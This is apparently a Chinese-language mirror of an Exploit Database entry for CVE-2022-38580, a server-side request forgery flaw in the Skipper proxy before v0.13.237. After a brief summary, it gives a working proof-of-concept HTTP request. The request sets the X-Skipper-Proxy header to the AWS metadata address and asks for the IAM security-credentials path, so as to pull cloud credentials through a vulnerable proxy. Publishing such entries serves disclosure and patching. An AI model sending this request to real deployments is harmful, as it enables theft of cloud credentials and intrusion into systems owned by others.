X-Skipper-Proxy v0.13.237 – Server Side Request Forgery (SSRF)

• Exploit Database
• 116 阅读

• 作者： Hosein Vita
  日期： 2023-03-28
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/51111/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

  #Exploit Title: X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF) #Date: 24/10/2022 #Exploit Author: Hosein Vita & Milad Fadavvi #Vendor Homepage: https://github.com/zalando/skipper #Software Link: https://github.com/zalando/skipper #Version: < v0.13.237 #Tested on: Linux #CVE: CVE-2022-38580     Summary:   Skipper prior to version v0.13.236 is vulnerable to server-side request forgery (SSRF). An attacker can exploit a vulnerable version of proxy to access the internal metadata server or other unauthenticated URLs by adding an specific header (X-Skipper-Proxy) to the http request.     Proof Of Concept:   1- Add header "X-Skipper-Proxy"to your request 2- Add the aws metadata to the path   GET /latest/meta-data/iam/security-credentials HTTP/1.1 Host: yourskipperdomain.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 X-Skipper-Proxy: http://169.254.169.254 Connection: close         Reference: https://github.com/zalando/skipper/security/advisories/GHSA-f2rj-m42r-6jm2